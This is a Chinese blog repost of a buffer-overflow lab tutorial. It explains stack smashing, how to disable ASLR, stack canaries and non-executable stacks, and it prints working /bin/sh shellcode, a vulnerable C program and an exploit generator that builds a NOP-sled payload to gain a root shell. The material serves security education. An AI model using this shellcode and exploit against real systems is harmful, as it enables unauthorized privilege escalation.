什么是缓冲区溢出攻击?(缓冲区溢出攻击的原理是什么)
citgpt 2024-09-14 01:47 5 浏览 0 评论
Buffer Overflow Vulnerability Lab
实验目的:掌握缓冲区溢出漏洞原理。
缓冲区溢出定义:程序企图在预分配的缓冲区之外写数据。
漏洞危害:用于更改程序执行流,控制函数返回值,执行任意代码。
漏洞产生原因:不可避免,由于程序存储数据(buffer)和程序(return address)
都在栈上,当存储数据覆盖了控制数据,就会发生缓冲区溢出的可能。
学习目标:
- 通过代码设计和利用缓冲区溢出漏洞获取ubuntu12的root权限。
- 掌握操作系统(linux OS)保护机制,阻止缓冲区溢出攻击。
你可以在ubuntu12虚拟机中完成本次实验,由于ubuntu中存在一些保护机制,
使缓冲区溢出很难实现,为此,我们需要关闭这些保护机制。
- 地址随机化(address space randomization)
堆/栈中的开始地址每次都不一样。
关闭地址随机化
- 栈保护机制(StackGuard Protection)
gcc编译器实现的安全机制,阻止缓冲区溢出漏洞。你可以关闭这种机制,
通过在编译时使用-fno-stack-protector选项。 - 栈不可执行(Non-Executable Stack)
ubuntu12默认栈不可执行,可以通过在编译的时候使用-z execstack选项来使堆栈可执行。
shellcode
shellcode是一段弹出shell的可执行代码,我们需要将这段可执行代码载入内核的buffer中,
通过缓冲区溢出漏洞,跳转到这段可执行代码处,让终端弹出shell。
#include <stdio.h>
int main( ) {
char *name[2];
name[0] = ‘‘/bin/sh’’;
name[1] = NULL;
//execve()
//参数1:sh可执行文件在系统中的路径指针
//参数2:数组指针,传递给执行文件
//参数3:传递给执行文件的新环境变量数组
execve(name[0], name, NULL);
}
执行效果与直接在/bin/目录下执行./sh效果一样。
shellcode长什么样?
const char code[] =
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
如何让shellcode运行?
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
//注意函数指针
((void(*)( ))buf)( );
}
shellcode汇编代码解读
执行这段程序栈和寄存器中数据:
The Vulnerable Program
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[24];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
当badfile文件中内容大小低于缓冲区大小的时候,程序正常。
当文件内容大小超过缓冲区大小的时候,程序异常,发生缓冲区溢出。
exploiting the Vulnerability
利用缓冲区溢出漏洞,实现获取root权限:
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
unsigned long get_sp()
{
__asm__("movl %esp,%eax");
}
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
long* addr_ptr,addr;
int offset = 200;
addr = get_sp() + offset;
addr_ptr = (long*)buffer;
for(int i = 0;i<10;i++)
*(addr_ptr++) = addr;
memcpy(buffer+sizeof(buffer)-sizeof(shellcode),
shellcode,sizeof(shellcode));
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
编译运行程序,即可以获取root权限:
相关推荐
- js中arguments详解
-
一、简介了解arguments这个对象之前先来认识一下javascript的一些功能:其实Javascript并没有重载函数的功能,但是Arguments对象能够模拟重载。Javascrip中每个函数...
- firewall-cmd 常用命令
-
目录firewalldzone说明firewallzone内容说明firewall-cmd常用参数firewall-cmd常用命令常用命令 回到顶部firewalldzone...
- epel-release 是什么
-
EPEL-release(ExtraPackagesforEnterpriseLinux)是一个软件仓库,它为企业级Linux发行版(如CentOS、RHEL等)提供额外的软件包。以下是关于E...
- FullGC详解 什么是 JVM 的 GC
-
前言:背景:一、什么是JVM的GC?JVM(JavaVirtualMachine)。JVM是Java程序的虚拟机,是一种实现Java语言的解...
-
2024-10-26 08:50 citgpt
- 跨域(CrossOrigin)
-
1.介绍 1)跨域问题:跨域问题是在网络中,当一个网络的运行脚本(通常时JavaScript)试图访问另一个网络的资源时,如果这两个网络的端口、协议和域名不一致时就会出现跨域问题。 通俗讲...
- 微服务架构和分布式架构的区别
-
1、含义不同微服务架构:微服务架构风格是一种将一个单一应用程序开发为一组小型服务的方法,每个服务运行在自己的进程中,服务间通信采用轻量级通信机制(通常用HTTP资源API)。这些服务围绕业务能力构建并...
- 深入理解与应用CSS clip-path 属性
-
clip-pathclip-path是什么clip-path 是一个CSS属性,允许开发者创建一个剪切区域,从而决定元素的哪些部分可见,哪些部分会被隐...
-
2024-10-25 11:51 citgpt
- Request.ServerVariables 大全
-
Request.ServerVariables("Url")返回服务器地址Request.ServerVariables("Path_Info")客户端提供的路...
- python操作Kafka
-
目录一、python操作kafka1.python使用kafka生产者2.python使用kafka消费者3.使用docker中的kafka二、python操作kafka细...
- Runtime.getRuntime().exec详解
-
Runtime.getRuntime().exec详解概述Runtime.getRuntime().exec用于调用外部可执行程序或系统命令,并重定向外部程序的标准输入、标准输出和标准错误到缓冲池。...
- promise.all详解 promise.all是干什么的
-
promise.all详解promise.all中所有的请求成功了,走.then(),在.then()中能得到一个数组,数组中是每个请求resolve抛出的结果...
-
2024-10-24 16:21 citgpt
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- oracleclient (56)
- springbatch (59)
- oracle恢复数据 (56)
- 简单工厂模式 (68)
- 函数指针 (72)
- fill_parent (135)
- java配置环境变量 (140)
- linux文件系统 (56)
- 计算机操作系统教程 (60)
- 静态ip (63)
- notifyicon (55)
- 线程同步 (58)
- xcode 4 5 (60)
- 调试器 (60)
- c0000005 (63)
- html代码大全 (61)
- header utf 8 (61)
- 多线程多进程 (65)
- require_once (60)
- 百度网盘下载速度慢破解方法 (72)
- 谷歌浏览器免费入口 (72)
- npm list (64)
- 网站打开速度检测 (59)
- 网站建设流程图 (58)
- this关键字 (67)